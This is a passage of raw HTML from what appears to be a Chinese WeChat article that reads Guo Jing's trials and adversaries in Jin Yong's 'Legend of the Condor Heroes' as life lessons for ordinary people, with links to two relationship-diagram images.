sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">ps:以上几个老师，技艺上的传承用的是师傅，做人以及价值观的传承用的师父。</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">        当然，郭靖成长绝不是全都是贵人，同样也有对抗、背刺~，如果能在困难/危机中还可以收益（蓄力第二曲线），效果更佳。反脆弱应用实战的几个人（一直跟郭靖做对，郭靖挨揍不少）：</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(255, 0, 0);">1. 梁子翁</span></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">前期开场，郭靖基本谁都打不过，为了救王初一，偷药。</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">回报</span>：吸了十多年的蛇血，强化体力、略显百毒不侵（桃花岛帮助老顽童吸毒时顽强对抗）</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(255, 0, 0);">2. 裘千仞</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(255, 0, 0);"> </span>   </span><o:page></o:page></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">价值观不同；对战时，黄蓉受伤。</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">回报</span>：获得武穆遗书（带兵打仗）、引出一灯（梵文总纲）</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(255, 0, 0);">3. </span></span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(255, 0, 0);">欧阳锋</span></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">皇宫对战欧阳锋受伤，牛家村曲三酒馆疗伤（悟懂天罡北斗阵、疗伤法）</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">回报</span>：武学宗师大漠陪练一个月(双赢，欧阳锋想得到九阴真经、郭靖强化了实战能力以及九阴真经的融会贯通)</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(255, 0, 0);">4. </span></span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(255, 0, 0);">杨康</span></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">两个人家世渊源，名字由来靖康之耻；“杨兄弟”；杨康背刺郭靖（错信的代价）；嘉兴之约（杨康使计谋杀了江南五怪~）</span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">回报</span>：当代人略显对立，下一代郭靖的真诚还是感动了杨过（真诚是必杀技）</span></p><p style="text-align: left;margin-left: 21pt;text-indent: -21pt;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin: 0px;text-indent: 2em;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="letter-spacing: normal;">郭靖每次都能在挨揍中成长，</span><span textstyle="" style="letter-spacing: normal;color: rgb(255, 0, 0);">可能普通人挨揍就被打死了</span><span textstyle="" style="letter-spacing: normal;">…，但在挨揍中/困境中思考总归是有增益。</span></span></p><p style="text-align: left;margin-left: 21pt;text-indent: -21pt;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: left;text-indent: 21pt;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;text-indent: 21pt;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">对于普通人的<span textstyle="" style="font-weight: bold;">成长启示</span>？</span></p><p style="text-align: left;text-indent: 21pt;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;text-indent: 21pt;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">普通人，三次重要的机会：</span><span lang="EN-US"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">          </span><span leaf=""><br/></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">      </span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">一、学历（玄门正宗、五绝的徒弟） </span></span></p><p style="text-align: left;text-indent: 21pt;margin-bottom: 0px;margin-top: 0px;"><span lang="EN-US"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">二、婚姻（黄蓉） </span></span></p><p style="text-align: left;text-indent: 21pt;margin-bottom: 0px;margin-top: 0px;"><span lang="EN-US"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">三、自我觉醒（我是谁？为什么要会武功？二次华山论剑，大侠路线）   </span></span><span lang="EN-US"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">       </span></span></p><p style="text-align: left;text-indent: 21pt;margin: 0px;"><span lang="EN-US"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">      </span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">开挂需要四种人：</span><span lang="EN-US"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">          </span><span leaf=""><br/></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">      </span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">一、名师指路（很多大佬点拨/教授/陪练）</span></span></p><p style="text-align: left;text-indent: 21pt;margin: 0px;"><span lang="EN-US"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">二、贵人相助  (郭靖具备很强的利他属性)  </span></span><span lang="EN-US"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">        </span></span></p><p style="text-align: left;text-indent: 21pt;margin: 0px;"><span lang="EN-US"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">三、亲人支持（郭母的支持、黄蓉非常支持郭靖，侠之大者）      </span></span></p><p style="text-align: left;text-indent: 21pt;margin: 0px;"><span lang="EN-US"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">四、小人刺激（欧阳锋、裘千仞）</span></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;text-indent: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;text-indent: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">        郭靖的成长史同样符合上篇<a href="https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484090&amp;idx=1&amp;sn=0f7a105c1b221d0e3d2a496b6135598c&amp;scene=21#wechat_redirect" textvalue="《金庸武侠-非线性理解的屌丝逆袭》" data-itemshowtype="0" target="_blank" linktype="text" data-linktype="2">《金庸武侠-非线性理解的屌丝逆袭》</a>关键要素：家庭背景、门派圈层、导师/老师、个人天赋、个人努力；</span></p><p style="text-align: left;text-indent: 0px;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;text-indent: 0px;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;text-indent: 0px;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">附射雕英雄传脉路推动图</span></p><section style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-imgfileid="100000548" data-ratio="1.6425925925925926" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a92d8829&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLf7PdYhrgeTiaEp3yPmu5UoN3ZYTEfqEYPamX7iaPnC1aKZ04Eryv8G5ibGlmY91gIib15ndUoPrt6Rw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section><p style="text-align: left;text-indent: 21pt;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;text-indent: 21pt;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">附郭靖的人脉关系图（神雕后期）</span></p><section style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-imgfileid="100000556" data-ratio="1.4296296296296296" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=f496d30a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLf7PdYhrgeTiaEp3yPmu5UoUeoShc1LSAnM5IW6XlrETrmzX3hgjIva1X83wbvNzqLVbUuK9VBElA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">          </span><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></o:p></p><p style="text-align: left;margin-bottom: 0px;margin-top: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">          </span><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, 